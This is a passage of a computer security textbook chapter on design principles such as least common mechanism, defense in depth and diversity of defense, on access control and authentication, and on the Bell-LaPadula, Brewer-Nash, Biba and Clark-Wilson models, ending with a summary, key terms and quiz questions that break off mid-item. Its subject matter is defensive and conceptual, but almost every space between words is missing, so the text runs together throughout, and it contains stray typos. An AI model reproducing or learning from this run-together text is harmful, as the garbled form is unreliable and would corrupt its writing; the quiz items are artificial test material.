LeastCommonMechanismTheprincipleofleastcommonmechanismstatesthatmechanismsusedtoaccessresourcesshouldbededicatedandnotshared.Sharingofmechanismsallowsapotentialcross-overbetweenchannelsresultinginaprotectionfailuremode.Forexample,ifthereisamodulethatenablesemployeestochecktheirpayrollinformation,aseparatemoduleshouldbeemployedtochangetheinformation,lestausergainaccesstochangeversusreadaccess.Althoughsharingandreusearegoodinonesense,theycanrepresentasecurityriskinanother.Commonexamplesoftheleastcommonmechanismanditsisolation
principleaboundinordinarysystems.Sandboxingisameansofseparatingtheoperationofanapplicationfromtherestoftheoperatingsystem.Virtualmachinesperformthesametaskbetweenoperatingsystemsonasinglepieceofhardware.Instantiatingsharedlibraries,inwhichseparateinstantiationoflocalclassesenablesseparatebutequalcoding,isyetanother.Thekeyistoprovideameansofisolationbetweenprocessessoinformationcannotflowbetweenseparateusersunlessspecificallydesignedtodoso.
Itoftenamazessecurityprofessionalshowfrequentlyindividualsrelyonsecuritythroughobscurityastheirmainlineofdefense.Relyingonsomepieceofinformationremainingsecretisgenerallynotagoodidea.Thisisespeciallytrueinthisageofreverse-engineering,whereindividualsanalyzethebinariesforprogramstodiscoverembeddedpasswordsorcryptographickeys.Thebiggestproblemwithrelyingonsecuritythroughobscurityisthatifitfailsandthe
secretbecomesknown,thereoftenisnoeasywaytomodifythesecrettore-secureit.
PsychologicalAcceptabilityPsychologicalacceptabilityreferstotheusers’acceptanceofsecuritymeasures.Usersplayakeyroleintheoperationofasystem,andifsecuritymeasuresareperceivedtobeanimpedimenttotheworkauserisresponsiblefor,thenanaturalconsequencemaybethattheuserbypassesthecontrol.Althoughausermayunderstandthatthiscouldresultinasecurityproblem,theperceptionthatitdoesresultintheirperformancefailurewillpresentpressuretobypassit.Psychologicalacceptabilityisoftenoverlookedbysecurity
professionalsfocusedontechnicalissuesandhowtheyseethethreat.Theyarefocusedonthethreat,whichistheirprofessionalresponsibility,sothefocusonsecurityisnaturalanditalignswiththeirprofessionalresponsibilities.Thisalignmentbetweensecurityandprofessionalworkresponsibilitiesdoesnotalwaystranslatetootherpositionsinanorganization.Securityprofessionals,particularlythosedesigningthesecuritysystems,shouldnotonlybeawareofthisconcept,butpayparticularattentiontohowsecuritycontrolswillbeviewedbyworkersinthecontextoftheirworkresponsibility,notwithrespecttosecurityforitsownsake.
DefenseinDepthDefenseindepthisaprinciplethatischaracterizedbytheuseofmultiple,differentdefensemechanismswithagoalofimprovingthedefensiveresponsetoanattack.Anothertermfordefenseindepthislayeredsecurity.Singlepointsoffailurerepresentjustthat,anopportunitytofail.Byusingmultipledefensesthataredifferent,withdifferingpointsoffailure,asystembecomesstronger.Whileonedefensemechanismmaynotbe100percenteffective,theapplicationofaseconddefensemechanismtotheitemsthatsucceedinbypassingthefirstmechanismprovidesastrongerresponse.Thereareacoupleofdifferentmechanismsthatcanbe
employedinadefense-in-depthstrategy:layeredsecurityanddiversityofdefense.Togethertheseprovideadefense-in-depthstrategythatisstrongerthananysinglelayerofdefense.Abankdoesnotprotectthemoneythatitstoresonlybyusingavault.It
hasoneormoresecurityguardsasafirstdefensetowatchforsuspiciousactivitiesandtosecurethefacilitywhenthebankisclosed.Itmayhavemonitoringsystemsthatwatchvariousactivitiesthattakeplaceinthebank,whetherinvolvingcustomersoremployees.Thevaultisusuallylocatedinthecenterofthefacility,andthustherearelayersofroomsorwallsbeforearrivingatthevault.Thereisaccesscontrol,whichensuresthatthepeopleenteringthevaulthavetobegivenauthorizationbeforehand.Andthesystems,includingmanualswitches,areconnecteddirectlytothepolicestationincaseadeterminedbankrobbersuccessfullypenetratesanyoneoftheselayersofprotection.Networksshouldutilizethesametypeoflayeredsecurityarchitecture.
Thereisno100percentsecuresystem,andthereisnothingthatisfoolproof,soasinglespecificprotectionmechanismshouldneverbesolelyreliedupon.Itisimportantthateveryenvironmenthavemultiplelayersofsecurity.Theselayersmayemployavarietyofmethods,suchasrouters,firewalls,networksegments,IDSs,encryption,authenticationsoftware,physicalsecurity,andtrafficcontrol.Thelayersneedtoworktogetherinacoordinatedmannersothatonedoesnotimpedeanother’sfunctionalityandintroduceasecurityhole.Asanexample,considerthestepsanintrudermighthavetotaketo
accesscriticaldataheldwithinacompany’sback-enddatabase.TheintruderfirsthastopenetratethefirewallandusepacketsandmethodsthatwillnotbeidentifiedanddetectedbytheIDS(moreinformationonthesedevicescanbefoundinChapter13).Theattackernexthastocircumventaninternalrouterperformingpacketfiltering,andthenpossiblypenetrateanotherfirewallusedtoseparateoneinternalnetworkfromanother(seeFigure2.3).Fromthere,theintrudermustbreaktheaccesscontrolsthatareonthedatabase,whichmeanshavingtodoadictionaryorbrute-forceattacktobeabletoauthenticatetothedatabasesoftware.Oncetheintruder
hasgottenthisfar,thedatastillneedstobelocatedwithinthedatabase.Thismayinturnbecomplicatedbytheuseofaccesscontrollistsoutliningwhocanactuallyviewormodifythedata.Thatisalotofwork.
•Figure2.3Layeredsecurity
Thisexampleillustratesthedifferentlayersofsecuritymanyenvironmentsemploy.Itisimportanttoimplementseveraldifferentlayersbecauseifintruderssucceedatonelayer,youwanttobeabletostopthematthenext.Theredundancyofdifferentprotectionlayersassuresthatthereisnoonesinglepointoffailurepertainingtosecurity.Ifanetworkusedonlyafirewalltoprotectitsassets,anattackerabletopenetratethisdevicesuccessfullywouldfindtherestofthenetworkopenandvulnerable.Anexampleofhowdifferentsecuritymethodscanworkagainsteach
otherisexemplifiedwhenfirewallsencounterencryptednetworktraffic.Anorganizationmayutilizeencryptionsothatanoutsidecustomercommunicatingwithaspecificwebserverisassuredthatsensitivedatabeingexchangedisprotected.IfthisencrypteddataisencapsulatedwithinSecureSocketsLayer(SSL)orTransportLayerSecurity(TLS)packetsandthensentthroughafirewall,thefirewallmaynotbeabletoreadthepayloadinformationintheindividualpackets.Thelayersusuallyaredepictedstartingatthetop,withmoregeneral
typesofprotection,andprogressingdownwardthrougheachlayer,withincreasinggranularityateachlayerasyougetclosertotheactualresource,asyoucanseeinFigure2.4.Thisisbecausethetop-layerprotectionmechanismisresponsibleforlookingatanenormousamountoftraffic,anditwouldbeoverwhelmingandcausetoomuchofaperformancedegradationifeachaspectofthepacketwereinspected.Instead,eachlayerusuallydigsdeeperintothepacketandlooksforspecificitems.Layersthatareclosertotheresourcehavetodealwithonlyafractionofthetrafficthatthetop-layersecuritymechanismdoes,andthuslookingdeeperandatmoregranularaspectsofthetrafficwillnotcauseasmuchofaperformancehit.
•Figure2.4Variouslayersofsecurity
DiversityofDefenseDiversityofdefenseisaconceptthatcomplementstheideaofvariouslayersofsecurity.Itinvolvesmakingdifferentlayersofsecuritydissimilarsothatevenifattackersknowhowtogetthroughasystemthatcomprisesonelayer,theymaynotknowhowtogetthroughadifferenttypeoflayerthatemploysadifferentsystemforsecurity.Ifanenvironmenthastwofirewallsthatformademilitarizedzone
(DMZ),forexample,onefirewallmaybeplacedattheperimeteroftheInternetandtheDMZ.Thisfirewallanalyzesthetrafficthatisenteringthroughthatspecificaccesspointandenforcescertaintypesofrestrictions.TheotherfirewallmaythenbeplacedbetweentheDMZandtheinternalnetwork.Whenapplyingthediversity-of-defenseconcept,youshouldsetupthesetwofirewallstofilterfordifferenttypesoftrafficandprovide
differenttypesofrestrictions.Thefirstfirewall,forexample,maymakesurethatnoFTP,SNMP,orTelnettrafficentersthenetworkbutallowSMTP,SSH,HTTP,andSSLtrafficthrough.ThesecondfirewallmaynotallowSSLorSSHthroughandmayinterrogateSMTPandHTTPtraffictomakesurethatcertaintypesofattacksarenotpartofthattraffic.
AccessControlThetermaccesscontrolhasbeenusedtodescribeavarietyofprotectionschemes.Itsometimesreferstoallsecurityfeaturesusedtopreventunauthorizedaccesstoacomputersystemornetwork.Inthissense,itmaybeconfusedwithauthentication.Moreproperly,accesscontrolistheabilitytocontrolwhetherasubject(suchasanindividualoraprocessrunningonacomputersystem)caninteractwithanobject(suchasafileorhardwaredevice).Authentication,ontheotherhand,dealswithverifyingtheidentityofasubject.Tohelpunderstandthedifference,considertheexampleofanindividualattemptingtologintoacomputersystemornetwork.Authenticationistheprocessusedtoverifytothecomputersystemornetworkthattheindividualiswhotheyclaimtobe.ThemostcommonmethodtodothisisthroughtheuseofauserIDandpassword.Oncetheindividualhasverifiedtheiridentity,accesscontrolsregulatewhattheindividualcanactuallydoonthesystem.Justbecauseapersonisgrantedentrytothesystemdoesnotmeanthattheyshouldhaveaccesstoalldatathesystemcontains.
AuthenticationMechanismsAccesscontrolsdefinewhatactionsausercanperformorwhatobjectsausercanhaveaccessto.Thesecontrolsassumethattheidentityoftheuserhasbeenverified.Itisthejobofauthenticationmechanismstoensurethatonlyvalidusersareadmitted.Describedanotherway,authenticationisusingsomemechanismtoprovethatyouarewhoyouclaimtobe.Therearethreegeneralfactorscommonlyusedinauthentication.Inorderto
verifyyouridentity,youcanprovide
Somethingyouknow(knowledgefactor)
Somethingyouhave(possessionfactor)
Somethingaboutyou(somethingthatyouare;inherentfactor)
Themostcommonauthenticationmechanismistoprovidesomethingthatonlyyou,thevaliduser,shouldknow.ThemostfrequentlyusedexampleofthisisthecommonuserID(orusername)andpassword.Intheory,sinceyouarenotsupposedtoshareyourpasswordwithanybodyelse,onlyyoushouldknowyourpassword,andthusbyprovidingit,youareprovingtothesystemthatyouarewhoyouclaimtobe.Anothermechanismforauthenticationistoprovidesomethingthatyouhaveinyourpossession,suchasamagneticstripecardthatcontainsidentifyinginformation.Thethirdmechanismistousesomethingaboutyouforidentificationpurposes,suchasyourfingerprintorthegeometryofyourhand.Obviously,forthesecondandthirdmechanismstowork,additionalhardwaredevicesneedtobeused(toreadthecard,fingerprint,orhandgeometry).
AccessControlvs.AuthenticationItmayseemthataccesscontrolandauthenticationaretwowaystodescribethesameprotectionmechanism.This,however,isnotthecase.Authenticationprovidesawaytoverifytothecomputerwhotheuseris.Oncetheuserhasbeenauthenticated,theaccesscontrolsdecidewhatoperationstheusercanperform.Thetwogohand-in-handbuttheyarenotthesamething.
AuthenticationandAccessControlPoliciesPoliciesarestatementsofwhattheorganizationwantstoaccomplish.Theorganizationneedstoidentifygoalsandintentionsformanydifferentaspectsofsecurity.Eachaspectwillhaveassociatedpoliciesand
procedures.
GroupPolicyOperatingsystemssuchasWindowsandLinuxallowadministratorstoorganizeusersintogroups,tocreatecategoriesofusersforwhichsimilaraccesspoliciescanbeestablished.Usinggroupssavestheadministratortime,asaddinganewuserwillnotrequiretheadministratortocreateacompletelynewuserprofile;instead,theadministratorcandeterminetowhichgroupthenewuserbelongsandthenaddtheusertothatgroup.Agrouppolicydefinesforthegroupthingssuchastheapplicable
operatingsystemandapplicationsettingsandpermissions.Examplesofgroupscommonlyfoundincludeadministrator,user,andguest.Takecarewhencreatinggroupsandassigninguserstothemsothatyoudonotprovidemoreaccessthanisabsolutelyrequiredformembersofthatgroup.Itwouldbesimpletomakeeverybodyanadministrator—itwouldcutdownonthenumberofrequestsusersmakeofbeleagueredadministrators—butthisisnotawisechoice,asitalsoenablesuserstomodifythesysteminwaysthatcouldimpactsecurity.Establishingtherightslevelsofaccessforthevariousgroupsupfrontwillsaveyoutimeandeliminatepotentialproblemsthatmightbeencounteredlateron.MoreonthissubjectwillbecoveredinChapter14.
TechTip
GroupPolicyThetermgrouppolicyhasdifferentmeaningsinLinuxandWindowssystems.InLinux,grouppoliciestypicallyrefertogroup-levelpermissionsassociatedwithfilesystems.InWindows,grouppoliciesrefertoActiveDirectoryobjectsusedtoenforceconfigurationandpermissionsacrossadomain.
PasswordPolicy
Sincepasswordsarethemostcommonauthenticationmechanism,itisimperativethatorganizationshaveapolicythataddressesthem.Thepasswordpolicyshouldaddresstheproceduresusedforselectinguserpasswords(specifyingwhatisconsideredanacceptablycomplexpasswordintheorganizationintermsofthecharactersetandlength),thefrequencywithwhichpasswordsmustbechanged,andhowpasswordswillbedistributed.Proceduresforcreatingnewpasswordsshouldanemployeeforgetheroldpasswordalsoneedtobeaddressed,aswellastheacceptablehandlingofpasswords(forexample,theyshouldnotbesharedwithanybodyelse,theyshouldnotbewrittendown,andsoon).Itmightalsobeusefultohavethepolicyaddresstheissueofpasswordcrackingbyadministrators,toenablethemtodiscoverweakpasswordsselectedbyemployees.
Apasswordpolicyisoneofthemostbasicpoliciesthatanorganizationcanhave.Makesureyouunderstandthebasicsofwhatconstitutesagoodpasswordalongwiththeotherissuesthatsurroundpasswordcreation,expiration,sharing,anduse.
Notethatthedeveloperofthepasswordpolicyandassociatedprocedurescangooverboardandcreateanenvironmentthatnegativelyimpactsemployeeproductivityandleadstopoorersecurity,notbetter.If,forexample,thefrequencywithwhichpasswordsarechangedistoogreat,usersmightwritethemdownorforgetthem.Neitheroftheseisadesirableoutcome,astheformermakesitpossibleforanintrudertofindapasswordandgainaccesstothesystem,andthelatterleadstotoomanypeoplelosingproductivityastheywaitforanewpasswordtobecreatedtoallowthemaccessagain.MoreinformationonpasswordpoliciescanbefoundinChapter22.
SecurityModels
Animportantissuewhendesigningthesoftwarethatwilloperateandcontrolsecurecomputersystemsandnetworksisthesecuritymodelthatthesystemornetworkwillbebasedupon.Thesecuritymodelwillimplementthesecuritypolicythathasbeenchosenandenforcethosecharacteristicsdeemedmostimportantbythesystemdesigners.Forexample,ifconfidentialityisconsideredparamount,themodelshouldmakecertainnodataisdisclosedtounauthorizedindividuals.Amodelenforcingconfidentialitymayallowunauthorizedindividualstomodifyordeletedata,asthiswouldnotviolatethetenetsofthemodelbecausethetruevaluesforthedatawouldstillremainconfidential.Ofcourse,thismodelmaynotbeappropriateforallenvironments.Insomeinstances,theunauthorizedmodificationofdatamaybeconsideredamoreseriousissuethanitsunauthorizeddisclosure.Insuchcases,themodelwouldberesponsibleforenforcingtheintegrityofthedatainsteadofitsconfidentiality.Choosingthemodeltobasethedesignoniscriticalifyouwanttoensurethattheresultingsystemaccuratelyenforcesthesecuritypolicydesired.This,however,isonlythestartingpoint,anditdoesnotimplythatyouhavetomakeachoicebetweenconfidentialityanddataintegrity,asbothareimportant.
ConfidentialityModelsDataconfidentialityhasgenerallybeenthechiefconcernofthemilitary.Forinstance,theU.S.militaryencouragedthedevelopmentoftheBell-LaPadulasecuritymodeltoaddressdataconfidentialityincomputeroperatingsystems.Thismodelisespeciallyusefulindesigningmultilevelsecuritysystemsthatimplementthemilitary’shierarchicalsecurityscheme,whichincludeslevelsofclassificationsuchasUnclassified,Confidential,Secret,andTopSecret.Similarclassificationschemescanbeusedinindustry,whereclassificationsmightincludePubliclyReleasable,Proprietary,andCompanyConfidential.Asecondconfidentialitymodel,theBrewer-Nashsecuritymodel,is
onedefinedbycontrollingreadandwriteaccessbasedonconflictof
interestrules.ThismodelisalsoknownastheChineseWallmodel,aftertheconceptofseparatinggroupsthroughtheuseofanimpenetrablewall.
Bell-LaPadulaModelTheBell-LaPadulasecuritymodelemploysbothmandatoryanddiscretionaryaccesscontrolmechanismswhenimplementingitstwobasicsecurityprinciples.ThefirstoftheseprinciplesiscalledtheSimpleSecurityRule,whichstatesthatnosubject(suchasauseroraprogram)canreadinformationfromanobject(suchasafile)withasecurityclassificationhigherthanthatpossessedbythesubjectitself.ThismeansthatthesystemmustpreventauserwithonlyaSecretclearance,forexample,fromreadingadocumentlabeledTopSecret.Thisruleisoftenreferredtoasthe“no-read-up”rule.
TheSimpleSecurityRuleisjustthat:themostbasicofsecurityrules.Itessentiallystatesthatinorderforyoutoseesomething,youhavetobeauthorizedtoseeit.
ThesecondsecurityprincipleenforcedbytheBell-LaPadulasecuritymodelisknownasthe*-property(pronounced“starproperty”).Thisprinciplestatesthatasubjectcanwritetoanobjectonlyifthetarget’ssecurityclassificationisgreaterthanorequaltotheobject’ssecurityclassification.ThismeansthatauserwithaSecretclearancecanwritetoafilewithaSecretorTopSecretclassificationbutcannotwritetoafilewithonlyanUnclassifiedclassification.Thisatfirstmayappeartobeabitconfusing,sincethisprincipleallowsuserstowritetofilesthattheyarenotallowedtoview,thusenablingthemtoactuallydestroyfilesthattheydon’thavetheclassificationtosee.Thisistrue,butkeepinmindthattheBell-LaPadulamodelisdesignedtoenforceconfidentiality,notintegrity.Writingtoafilethatyoudon’thavetheclearancetoviewisnotconsideredaconfidentialityissue;itisanintegrityissue.Whereasthe*-propertyallowsausertowritetoafileofequalor
greatersecurityclassification,itdoesn’tallowausertowritetoafilewithalowersecurityclassification.This,too,maybeconfusingatfirst—afterall,shouldn’tauserwithaSecretclearance,whocanviewafilemarkedUnclassified,beallowedtowritetothatfile?Theanswertothis,fromasecurityperspective,is“no.”Thereasonagainrelatestowantingtoavoideitheraccidentalordeliberatesecuritydisclosures.Thesystemisdesignedtomakeitimpossible(hopefully)fordatatobedisclosedtothosewithouttheappropriateleveltoviewit.AsshowninFigure2.5,ifitwerepossibleforauserwithaTopSecretclearancetoeitherdeliberatelyoraccidentallywriteTopSecretinformationandplaceitinafilemarkedConfidential,auserwithonlyaConfidentialsecurityclearancecouldthenaccessthisfileandviewtheTopSecretinformation.Thus,datawouldhavebeendisclosedtoanindividualnotauthorizedtoviewit.Thisiswhatthesystemshouldprotectagainstandisthereasonforwhatisknownasthe“no-write-down”rule.
•Figure2.5Bell-LaPadulasecuritymodel
Notallenvironmentsaremoreconcernedwithconfidentialitythanintegrity.Inafinancialinstitution,forexample,viewingsomebody’sbankbalanceisanissue,butagreaterissuewouldbetheabilitytoactuallymodifythatbalance.Inenvironmentswhereintegrityismoreimportant,adifferentmodelthantheBell-LaPadulasecuritymodelisneeded.
Brewer-NashSecurityModelOneofthetenetsassociatedwithaccessisneedtoknow.Separategroupswithinanorganizationmayhavedifferingneedswithrespecttoaccesstoinformation.Asecuritymodelthattakesintoaccountuserconflict-of-interestaspectsistheBrewer-Nashsecuritymodel.Inthismodel,informationflowsaremodeledtopreventinformationfromflowingbetweensubjectsandobjectswhenaconflictofinterestwouldoccur.Aspreviouslynoted,thismodelisalsoknownasaChineseWallmodel,aftertheGreatWallofChina,astructuredesignedtoseparategroupsofpeople.AsshowninFigure2.6,separategroupsaredefinedandaccesscontrolsaredesignedtoenforcetheseparationofthegroups.
•Figure2.6Brewer-Nashsecuritymodel
IntegrityModels
TheBell-LaPadulamodelwasdevelopedintheearly1970sbutwasfoundtobeinsufficientforallenvironments.Asanalternative,KennethBibastudiedtheintegrityissueanddevelopedwhatiscalledtheBibasecuritymodelinthelate1970s.Additionalworkwasperformedinthe1980sthatledtotheClark-Wilsonsecuritymodel,whichalsoplacesitsemphasisonintegrityratherthanconfidentiality.
TheBibaSecurityModelIntheBibamodel(seeFigure2.7),insteadofsecurityclassifications,integritylevelsareused.Aprincipleofintegritylevelsisthatdatawithahigherintegritylevelisbelievedtobemoreaccurateorreliablethandatawithalowerintegritylevel.Integritylevelsindicatethelevelof“trust”thatcanbeplacedininformationatthedifferentlevels.Integritylevelsdifferfromsecuritylevelsinanotherway—theylimitthemodificationofinformationasopposedtotheflowofinformation.
•Figure2.7BibbSecurityModel
Aninitialattemptatimplementinganintegrity-basedmodelwascapturedinwhatisreferredtoastheLow-Water-Markpolicy.Thispolicyinmanywaysistheoppositeofthe*-propertyinthatitpreventssubjectsfromwritingtoobjectsofahigherintegritylevel.Thepolicyalsocontainsasecondrulethatstatestheintegritylevelofasubjectwillbeloweredifitreadsanobjectofalowerintegritylevel.Thereasonforthisisthatifthesubjectthenusesdatafromthatobject,thehighesttheintegritylevelcanbeforanewobjectcreatedfromitisthesamelevelofintegrityoftheoriginalobject.Inotherwords,theleveloftrustyoucan
placeindataformedfromdataataspecificintegritylevelcannotbehigherthantheleveloftrustyouhaveinthesubjectcreatingthenewdataobject,andtheleveloftrustyouhaveinthesubjectcanonlybeashighastheleveloftrustyouhadintheoriginaldata.ThefinalrulecontainedintheLow-Water-Markpolicystatesthatasubjectcanexecuteaprogramonlyiftheprogram’sintegritylevelisequaltoorlessthantheintegritylevelofthesubject.Thisensuresthatdatamodifiedbyaprogramonlyhastheleveloftrust(integritylevel)thatcanbeplacedintheindividualwhoexecutedtheprogram.WhiletheLow-Water-Markpolicycertainlypreventsunauthorized
modificationofdata,ithastheunfortunatesideeffectofeventuallyloweringtheintegritylevelsofallsubjectstothelowestlevelonthesystem(unlessthesubjectalwaysviewsfileswiththesamelevelofintegrity).Thisisbecauseofthesecondrule,whichlowerstheintegritylevelofthesubjectafteraccessinganobjectofalowerintegritylevel.Thereisnowayspecifiedinthepolicytoeverraisethesubject’sintegritylevelbacktoitsoriginalvalue.Asecondpolicy,knownastheRingpolicy,addressesthisissuebyallowinganysubjecttoreadanyobjectwithoutregardtotheobject’slevelofintegrityandwithoutloweringthesubject’sintegritylevel.This,unfortunately,canleadtoasituationwheredatacreatedbyasubjectafterreadingdataofalowerintegritylevelcouldenduphavingahigherleveloftrustplaceduponitthanitshould.TheBibasecuritymodelimplementsahybridoftheRingandLow-
Water-Markpolicies.Biba’smodelinmanyrespectsistheoppositeoftheBell-LaPadulamodelinthatwhatitenforcesare“no-read-down”and“no-write-up”policies.Italsoimplementsathirdrulethatpreventssubjectsfromexecutingprogramsofahigherlevel.TheBibasecuritymodelthusaddressestheproblemsmentionedwithboththeRingandLow-Water-Markpolicies.
TheClark-WilsonSecurityModelTheClark-WilsonsecuritymodeltakesanentirelydifferentapproachthantheBibaandBell-LaPadulamodels,usingtransactionsasthebasisfor
itsrules.Itdefinestwolevelsofintegrityonly:constraineddataitems(CDIs)andunconstraineddataitems(UDIs).CDIdataissubjecttointegritycontrolswhileUDIdataisnot.Themodelthendefinestwotypesofprocesses:integrityverificationprocesses(IVPs),whichensurethatCDIdatameetsintegrityconstraints(toensurethesystemisinavalidstate),andtransformationprocesses(TPs),whichchangethestateofdatafromonevalidstatetoanother.Datainthismodelcannotbemodifieddirectlybyauser;itmustbechangedbytrustedTPs,accesstowhichcanberestricted(thusrestrictingtheabilityofausertoperformcertainactivities).Itisusefultoreturntothepriorexampleofthebankingaccountbalance
todescribetheneedforintegrity-basedmodels.IntheClark-Wilsonmodel,theaccountbalancewouldbeaCDIbecauseitsintegrityisacriticalfunctionforthebank.Aclient’scolorpreferencefortheircheckbookisnotacriticalfunctionandwouldbeconsideredaUDI.Sincetheintegrityofaccountbalancesisofextremeimportance,changestoaperson’sbalancemustbeaccomplishedthroughtheuseofaTP.EnsuringthatthebalanceiscorrectwouldbethedutyofanIVP.Onlycertainemployeesofthebankshouldhavetheabilitytomodifyanindividual’saccount,whichcanbecontrolledbylimitingthenumberofindividualswhohavetheauthoritytoexecuteTPsthatresultinaccountmodification.CertainverycriticalfunctionsmayactuallybesplitintomultipleTPstoenforceanotherimportantprinciple,separationofduties(introducedearlierinthechapter).Thislimitstheauthorityanyoneindividualhassothatmultipleindividualswillberequiredtoexecutecertaincriticalfunctions.
Chapter2Review
ChapterSummary
Afterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingregardingthebasicsofsecurity,securityterminology,andsecuritymodels.
Definebasictermsassociatedwithcomputerandinformationsecurity
Informationassuranceandinformationsecurityplacethesecurityfocusontheinformationandnotonthehardwareorsoftwareusedtoprocessit.
Theoriginalgoalofcomputerandnetworksecuritywastoprovideconfidentiality,integrity,andavailability—the“CIA”ofsecurity.
Additionalelementsofsecuritycanincludeauthentication,authorization,auditability,andnonrepudiation.
Theoperationalmodelofcomputersecuritytellsusthatprotectionisprovidedbyprevention,detection,andresponse.
Identifythebasicapproachestocomputerandinformationsecurity
Hostsecurityfocusesonprotectingeachcomputeranddeviceindividually,whereasnetworksecurityfocusesonaddressingprotectionofthenetworkasawhole.
Formanyorganizations,acombinationofhostsecurityandnetworksecurityisneededtoadequatelyaddressthewiderangeofpossiblesecuritythreats.
Identifythebasicprinciplesofcomputerandinformationsecurity
Principleofleastprivilegeistousetheminimumprivilegesnecessarytoperformatask.
Principleofseparationofprivilegestatesthatcriticalitemsshouldrequiremultipleparties.
Principleoffail-safedefaultstatesthatdenybydefault(implicitdeny)andonlygrantaccesswithexplicitpermissionshouldbeemployedin
accessdecisions.
Principleofeconomyofmechanismstatesthatprotectionmechanismsshouldbesmallandsimple.
Principleofcompletemediationstatesthatprotectionmechanismsshouldcovereveryaccesstoeveryobjectandshouldneverbebypassed.
Principleofopendesignstatesthatprotectionmechanismsshouldnotdependuponsecrecyofthemechanismitself.
Principleofleastcommonmechanismstatesthattheprotectionmechanismsshouldbesharedtotheleastdegreepossibleamongusers.
Principleofpsychologicalacceptabilitystatesthatprotectionmechanismsshouldnotimpactusers,oriftheydo,theimpactshouldbeminimal.
Principleofdefenseindepth,orlayeredsecurity,isthatmultiplelayersofdiffering,overlappingcontrolsshouldbeemployed.
Diversityofdefenseisaconceptthatcomplementstheideaofvariouslayersofsecurity.Itmeanstomakethelayersdissimilarsothatifonelayerispenetrated,thenextlayercan’talsobepenetratedusingthesamemethod.
Distinguishamongvariousmethodstoimplementaccesscontrols
Accessistheabilityofasubjecttointeractwithanobject.Accesscontrolsarethosedevicesandmethodsusedtolimitwhichsubjectsmayinteractwithspecificobjects.
Anaccesscontrollist(ACL)isamechanismthatisusedtodefinewhetherauserhascertainaccessprivilegesforasystem.Othermethodsincludediscretionaryaccesscontrol(DAC),mandatoryaccesscontrol(MAC),role-basedaccesscontrol(RBAC),andrule-basedaccesscontrol.
Describemethodsusedtoverifytheidentityandauthenticityofanindividual
Authenticationmechanismsensurethatonlyvalidusersareprovidedaccesstothecomputersystemornetwork.
Thethreegeneralmethodscommonlyusedinauthenticationinvolveusersprovidingeithersomethingtheyknow,somethingtheyhave,orsomethinguniqueaboutthem(somethingtheyare).
Recognizesomeofthebasicmodelsusedtoimplementsecurityinoperatingsystems
Securitymodelsenforcethechosensecuritypolicy.
Therearetwobasiccategoriesofmodels:thosethatensureconfidentialityandthosethatensureintegrity.
Bell-LaPadulaisaconfidentialitysecuritymodelwhosedevelopmentwaspromptedbythedemandsoftheU.S.militaryanditssecurityclearancescheme.
TheBell-LaPadulasecuritymodelenforces“no-read-up”and“no-write-down”rulestoavoidthedeliberateoraccidentaldisclosureofinformationtoindividualsnotauthorizedtoreceiveit.
TheBrewer-Nashsecuritymodel(ChineseWallmodel)isaconfidentialitymodelthatseparatesusersbasedonconflictsofinterest.
TheBibasecuritymodelisanintegrity-basedmodelthat,inmanyrespects,implementstheoppositeofwhattheBell-LaPadulamodeldoes—thatis,“no-read-down”and“no-write-up”rules.
TheClark-Wilsonsecuritymodelisanintegrity-basedmodeldesignedtolimittheprocessesanindividualmayperformaswellasrequirethatcriticaldatabemodifiedonlythroughspecifictransformationprocesses.
KeyTerms*-property(34)accesscontrol(31)auditability(20)authentication(20)availability(20)Bell-LaPadulasecuritymodel(34)Bibasecuritymodel(35)Brewer-Nashsecuritymodel(34)Clark-Wilsonsecuritymodel(37)completemediation(27)confidentiality(20)defaultdeny(26)defenseindepth(29)diversityofdefense(31)economyofmechanism(27)fail-safedefaults(26)hacking(19)hostsecurity(23)implicitdeny(26)integrity(20)layeredsecurity(29)leastcommonmechanism(28)leastprivilege(24)Low-Water-Markpolicy(36)networksecurity(24)nonrepudiation(20)opendesign(27)operationalmodelofcomputersecurity(20)phreaking(19)
psychologicalacceptability(29)Ringpolicy(36)securitythroughobscurity(28)separationofduties(25)separationofprivilege(25)SimpleSecurityRule(34)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1._______________isatermusedtodescribetheconditionwhereausercannotdenythataneventhasoccurred.
2.The_______________isanintegrity-basedsecuritymodelthatbasesitssecurityoncontroloftheprocessesthatareallowedtomodifycriticaldata,referredtoasconstraineddataitems.
3.ThesecurityprincipleusedintheBell-LaPadulasecuritymodelthatstatesthatnosubjectcanreadfromanobjectwithahighersecurityclassificationiscalledthe_______________.
4.Theprinciplethatstatesasubjecthasonlythenecessaryrightsandprivilegestoperformitstask,withnoadditionalpermissions,iscalled_______________.
5._______________istheprincipleinsecuritywhereprotectionmechanismsshouldbekeptassimpleandassmallaspossible.
6._______________istheprinciplethatprotectionmechanismsshouldminimizeuser-levelimpact.
7._______________istheprocessusedtoensurethatanindividualiswhotheyclaimtobe.
8.Thearchitectureinwhichmultiplemethodsofsecuritydefenseare
appliedtopreventrealizationofthreat-basedrisksiscalled_______________.
9._______________istheprocessofcombiningseeminglyunimportantinformationwithotherpiecesofinformationtodivulgepotentiallysensitiveinformation.
10.Implicitdenyisanoperationalizationoftheprincipleof_______________.
Multiple-ChoiceQuiz1.Whichofthefollowingisnotaprincipleofsecurity?
A.Principleofleastprivilege
B.Principleofeconomyofmechanism
C.Principleofefficientaccess
D.Principleofopenaccess
2.TheCIAofsecurityincludes:A.Confidentiality,integrity,authentication
B.Confidentiality,integrity,availability
C.Certificates,integrity,availability
D.Confidentiality,inspection,authentication
3.ThesecurityprincipleusedintheBell-LaPadulasecuritymodelthatstatesthatnosubjectcanreadfromanobjectwithahighersecurityclassificationisthe:
A.SimpleSecurityRule
B.Ringpolicy
C.Mandatoryaccesscontrol
D.*-property
4.Whichofthefollowingconceptsrequiresusersandsystemprocessestousetheminimalamountofpermissionnecessarytofunction?
A.Layerdefense
B.Diversifieddefense
C.SimpleSecurityRule
D.Leastprivilege
5.Whichsecuritymodelseparatesusersbasedonconflict-of-interestissues?
A.Bell-LaPadula
B.Brewer-Nash
C.Biba
D.Clark-Wilson
6.TheBell-LaPadulasecuritymodelisanexampleofasecuritymodelthatisbasedon:
A.Theintegrityofthedata
B.Theavailabilityofthedata
C.Theconfidentialityofthedata
D.Theauthenticityofthedata
7.Thetermusedtodescribetherequirementthatdifferentportionsofacriticalprocessmustbeperformedbydifferentpeopleis:
A.Leastprivilege
B.Defenseindepth
C.Separationofduties
D.Jobrotation
8.Hidinginformationtopreventdisclosureisanexampleof:A.Securitythroughobscurity
